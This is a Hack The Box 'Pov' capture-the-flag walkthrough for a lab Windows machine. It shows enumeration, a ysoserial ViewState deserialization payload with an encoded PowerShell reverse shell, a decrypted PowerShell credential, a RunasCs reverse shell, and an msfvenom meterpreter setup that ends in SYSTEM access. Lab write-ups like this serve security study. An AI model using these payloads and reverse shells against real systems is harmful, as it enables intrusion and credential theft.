# HTB - Pov > ### IP Address: 10.10.11.251 ### **Machine Info** Pov is a medium Windows machine that starts with a webpage featuring a business site. Enumerating the initial webpage, an attacker is able to find the subdomain `dev.pov.htb`. Navigating to the newly discovered subdomain, a `download` option is vulnerable to remote file read, giving an attacker the means to get valuable information from the `web.config` file. The subdomain uses the `ViewState` mechanism, which, in combination with the secrets leaked from the `web.config` file, is vulnerable to insecure deserialization, leading to remote code execution as the user `sfitz`. Looking at the remote filesystem, an attacker can discover and manipulate a file that reveals the credentials for the user `alaading`. Once the attacker has code execution as the user `alaading` the `SeDebugPrivilege` is abused to gain code execution in the context of a privileged application, ultimately resulting in code execution as `nt authority\system`. ### **Enumeration** #### Nmap Scan ``` ┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov] └─$ nmap -F $ip -Pn PORT STATE SERVICE 80/tcp open http ┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov] └─$ nmap -p- --min-rate 2500 $ip -Pn PORT STATE SERVICE 80/tcp open http ┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov] └─$ nmap -sC -sV -p80 $ip PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: pov.htb |_http-server-header: Microsoft-IIS/10.0 ``` #### Fuzz for subdomains ``` ┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov] └─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://pov.htb/ -H 'Host: FUZZ.pov.htb' dev [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 131ms] ``` #### Add to /etc/hosts ``` ┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov] └─$ sudo sh -c "echo '10.10.11.251 pov.htb dev.pov.htb' >> /etc/hosts" ``` #### LFI
#### web.config
From the secrets from web.config file, I can create .NET serialized object and attempt to get RCE ### **Shell as pov\sfitz** #### **Creating serialized object with ysoerial** ```bash .\ysoserial.exe -p ViewState -g WindowsIdentity --path="/portfolio" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" -validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --validationalg="SHA1" -c "powershell -c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAxACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" rQkpxoUR3biNzp3mTLbIkpX1ROXuVDredVARBpljCQ7S2YdpUGClf67G8NN%2FRnU8uksJYAl3lw5oPGmxJ6MCPRjOs58yA3RgtaCZ5q16sVjLv9qbHP%2FDm1ONIo5ElkOt5GpqVPmnmqIvBZtMEk8mMlVCkucZgpdnkDTO428lWjsVJxfvEZgOX0Tj2BK8uvPpCPvlyjAS02gCiXpBQgkFfUF3UXgpxK2L9OVQ%2BK88H5zHd1fHXc4HC8ritovqr%2B%2F%2F1cpGGc4ThrdP%2BpEA95zs2%2BBvy0lBdnR6h3N7w6Gb7p%2FDcX%2BZtzC7C0hMJbX41iNu%2FCmqAYROEu%2Bs1hVH%2BVmmk1SbRgqTHV8JmrDWRbP7OCfqiYJynyEIOAGAMXcfkbf5luNmXzvIchTv6TXaL84uQ6rEcbRCHtmanA5OMpnpG%2Bhf77NyMOIKRIhLRLV8Aucp4irZ0FjXi9AZv9jmbmJZ9prZ%2F7x0aSROdwlUVLuJWl4O7J5INEer0m%2FJuCQNx9X1mxer%2FblF8GeKJkNIBiPQhCvHj159AxmRGEyogoQBlSEP5glWyzZf2IyH9CIPyz4aQGHU2JYFtm5VXyH%2F4J15b8vb0m2dEbk0Htmp9BfPAOjAFuPsgfyzIa1PyYeCn5DdV1ZAHPgogqDEtEjg1qKrUkXMx8Ve0XfUBvuvExNuiaWuidnNpl31D44PdkvTdsoUG0nBO6NxP%2BgQF90GjKYKX57JTB%2Bleth446Nee2TDpTHLSf6hRnzqnbLAmaevDu37NjlvCJstCGqesPtSs8yqmGXFSOu%2BJNOnLTYcrr41eGGpqDhMULGF%2FHnBRHGaCY3PJzjhyn9PBb1oaMCuccWiJnmkpaB8TwXrow5VrT0l02LMk1JtBcNJO5NC5sMrA8vthZXmL4cwHFZ6Z20rrAS3JNt3cAEW1qLjyTRJvKh7aHEiIZ25R2P8yvKGxSDHpCIKKhjXGwbkr0qULbH8NqB6Au30RWaqZF6WNrqqBwiD%2By49zy6y0K%2Bs1WLi821Nwp6TVPvs%2Bok9a0rMN4QgaExyA1qAv6JwxEkdBJltVMH8ymbM26sLMCi7Ui2ya6Eq5x5BVVl97AsLiFqUTGdJOgdEMhO%2FNyHO4iuemFuUHTpMMdeIOOt%2F7%2Fjh2yje%2Bqe7x2dhpER63%2FTsiiSyCnTZSdt4T0Iy8o0t%2BkE9d%2B%2BLvrhlTQNRe8wanrnScyDOmXG2rUu5bfLbXS8BTPjF5DwryUUGikcOxoovIckg32OyPwkMRLomJ0yZoIWzkQBIgJ61JZfhJ%2BH0FcARRF%2BbA3G83D0s3Mtmg2QHojtXtSQ8EtBWfJqjyfm0oA5%2FaeNfsKp5EuKXxqiIKmmaOPN1onN2pVxOH5fAtGfa2tZFx0b3FStcsNOeHJ6z2HNOSNXq6Kdn3WgC7COcowAlTNJBwrbp3xp71wl5cKwGcvmacnpqBIoACD9IMSRGViRBhqA138Kv2jO0t7x7a9FC9z0on3NPkI%2Fg3RRiKyWHjXcMQWLetSMQouqSZOm7pXt7%2F90vVc3KfUGXJkYNcgpJD9MCv2VpERQ9Cwu7HHKkdlxefX5gVwadNUj3g1nPa9Xsw2cgezQYySNof5kBCOSCvgPT2kKuAPb%2BZhNxwQRkwqXN4ChhI9WitDdpWKAfPBST%2B8hRrG2D0IVOYhRuVnHBMIjAfh4XI05D8w3f9SghrgrRckvY%2F02jjrZ2UqBBnDiqf8WLLwqXZWAM3oTT7z5Mn3gie8EyLFv6iFd9wGutmE2nCMMw8Pe8eZqgJWyy6vy0KGCk3hVzoFfcf2MlsB5ZP2SzlNAQKfd%2F6fFi8ohFNXYGi0TBXkuczRA7WXr6etUu43MzcQWNDBMSQ882nuslcNC2Ba5fXVWGbGNtgo2m5liiVYH3uv2KH3379e6OsbH6a%2F448A8f9eSQp2cFYezM8y869EMH9bXpQtUZtZ0PrrERBc80sEQI3Op%2BkF%2BfizdfHG0sszoGYkyUWfTKb3%2F0g66Qv4FN%2BON0Nm91Z27%2FHfGmWwjwlAhrxoGAxuK7GFRSa3ZREnqSsY1JpoNpz%2FImUDgI9VyVISRTiZ8AJEkbyCW3unN7xYsmNFMvrbGbxrykNU0i%2BxQHeAx7QsZ9DsmPH4syCg2QjQ%2FCiQk8vQVKNZNvd2r82hFygg5%2BWnE4QmEv483HMiIJIXb1h9sd25Y%2BkI%2Bk3oiMgOGHiyceZG54%2By5H9AOUEFUp81K1GQiNtyN9%2B646lfN4T%2FoGyPuAQgkaokAxy69Gb7Jqi6OvG5iAoKYsf0kvfibmQ7QQ7ZsTxyo%2FlKACfBLnFyHCRnSJxnu3W%2B21W%2BlJ7TE6A1fpEHkD6NM6ATHvUT7lcPl9mZca6HUNgzJ8lIFDDaLl1fEDBCJeTXytbjZ%2BnAB2lsJDww9iHjIv2Ujtsax80RiIXFet5A4uUFii4M6vEkQ8wCE119R%2FoYfvd5QedvOr5LIvrXJlqn5MDkfMvxzeEidK7i2poJeH7p6eIioyhA814mDZyyImrhqFX11lEOWTZLhvrbp%2BaUzgM9n7hkvnDNcYSbibBWH57zKsMqEstEdFSc%2BPs2ancizWrodNMhG34elppw3DK8trdoR6PQPsxf8Fw1QitDBFjdD2UuRGj7gF7VODq5JLnVsK9F%2BqW6tTe2WMPfhxQVJ1Z1Wc%2BfbEfo93ClmWteISv9KwlRe%2FMH%2FX0vS%2BkhzkzkDg%2BYFrXT1V1WlAQOC9eZpdytkeGvnY67IgtI8mNVMhd3mMcVS7iA362AhEC6%2FTzgvyMW8xdNiY%2BkN30FRpngvPGIcyBK%2FOPdpo881EWtTkqaitxxgNuOW5%2BpWFbfReBsVQSKEknlnf414S3nT7Ng8t1kT2U7PzYNdXUli9F81fEh7MXPfuhQBXuh0hk13zy70AV0a0FLT1l%2BlA2BRYfOlDvDm5HE0zWBJOLgII2AgQGRmUmDup3w%2FdULgdH9e8xEXMVne1X9HRLpmeILfauTYai2tXPwOt2N1wlJvRiNg4adbugqpeGm%2FRBvPx5Glg3AcDSJmBFEcF9fr2ZYn%2BzB8CCOSaHe%2FkqImP9FW4z0T%2FshjgStQarppt25pnsqCkwdHr3cpX53nu6SOqg7U%2BANFhdkuVDR4vY%2BhfaOJi44RANAACBpy14aeibWyHqKz%2BzwrS453%2BT1UJw5eMwHtTKl6ETBhLibBR%2BBX0jZWWpaD7VIxFQKIMbdkvuaVludGedKGTaeoSIKBYK5cN%2B7FlfVUI7%2FwHoEUt1cH3u6GtdOwm5wxWFGXMvPNWMDFzzkZAibylrClRjqxJbAqf3ijXuTKxXCQBu6rJxHioZq3pTh1ruLTNzLIKQ%2FScRGKuLaqNd0mSQI6rSnp0mdSBnD%2FgW10bcRKESfOWvFD1yTUSPCI3ujU6T0tP%2BQaOzhcuoZpMjVlbUAJv%2BS43SF42d2CdyvWib4GcKCPH6yRNwsKJrcfFl3DPvmlZcN9TfIJaZ9q2VeQyU2WaRK3YL83hme53lxFi4G2ySbPAu8tzoPgOCWb0n6pnsQFOLQ%2FoQ4KAYEpZH2Tn4%2BejZlj%2BHZrfBZi9a67Cxvvmq61ipj6HGBSfgfMO7VrxfhUlE2f2nR76jwF8BZ1XlvEKNg9H1HKtbgg%2F7KUvDgWfBFXpWdkuWy5QlCjRKlJ3mu%2F%2FEJStdP%2FEL%2BmbJG7u0A38hJxdrKwmvPJvVlbfxGjq2WNC8qvsdV9mODugxnMm2K%2F8IOJM8zkTTRlJR4m3i79Dgci56Ty5umrn744ok8j79FX8llxpIvxAG96Oixtl%2BPx6%2FjpG9D6toA5p9cdy%2BtFm%2F7UH53uH61JAp0Z3W6BWScN9dMohd5VuG7bzublkTYzAQZw7QEvh3TKncKJhahGJige7WoidZQTLmVqzFnY9cx9x0So3FsS5mTcxf%2FxqbeALEZeofjrWaFhEMidOFbYLjfVA26smK0TS1VJz4BKp7LJNn4ca0vJ5pDQnEqqqDFdd1fNkPW1SIcRMlphq%2B%2Fzw3ZUboL0sBZsFXS%2FDBbfQogDLICmqc%2FTyVeNT8y2coocraBASh1hYKeXTJ%2FYvCHxa6GWljDtsyEg3oZ5P1LWWTxf3i4drwsDuD8C8kngaeJdD%2By5lwyKFnFPZh%2BTVwaRbAaJWNF5cQYdIg68MIJVWnxyDgpxWIXRYQJDaIoe1sstBLGJbCfUhOg%2Ft4WYazlX1LxLgvG4mMU2AL7PoRoXPm91NDJaNH52GiiLhTsNbZqbkhwROu4XGkqW07iw5wsRYnGWv%2F5TPEdQ%3D ``` **I inject the object above in \_VIEWSTATE parameter and get a shell as alaading** ### **Shell as alaading** ```powershell PS C:\users\sfitz\documents> ls Directory: C:\users\sfitz\documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 12/25/2023 2:26 PM 1838 connection.xml ``` It is a PS Credential for alaading: ```powershell System.Management.Automation.PSCredential System.Object System.Management.Automation.PSCredential alaading 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6 ``` * PowerShell credentials are often used for scripting and automation tasks as a way to store encrypted credentials conveniently. * The credentials are protected using [DPAPI](https://en.wikipedia.org/wiki/Data_Protection_API), which typically means they can only be decrypted by the same user on the same computer they were created on. ```powershell PS C:\users\sfitz\documents> $credential = Import-Clixml -Path 'C:\users\sfitz\documents\connection.xml' PS C:\users\sfitz\documents> $credential.GetNetworkCredential().username PS C:\users\sfitz\documents> $credential.GetNetworkCredential().password ``` ``` alaading:f8gQ8fynP44ek1m3 ``` ```powershell PS C:\users\sfitz\documents> .\RunasCs.exe alaading f8gQ8fynP44ek1m3 PowerShell.exe -r 10.10.16.21:443 ``` ### **I'm the Administrator :)** * If you have `SeDebug privileges`, you can debug programs and processes from memory, so we can dump `lsass.exe` process and get all the secrets and hashes from the machine. * To get RCE as SYSTEM account, you can start meterperter shell and migrate to winlogon process from Metasploit ```bash msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9001 -f exe -o shell.exe msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST tun0 msf6 exploit(multi/handler) > set LPORT 9001 msf6 exploit(multi/handler) > run ``` ```bash meterpreter > ps winlogon PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 548 468 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe meterpreter > migrate 548 meterpreter > gituid Server username: NT AUTHORITY\SYSTEM meterpreter > shell ```
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blind0bandit.gitbook.io/blog/windows-machines/medium/htb-pov.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.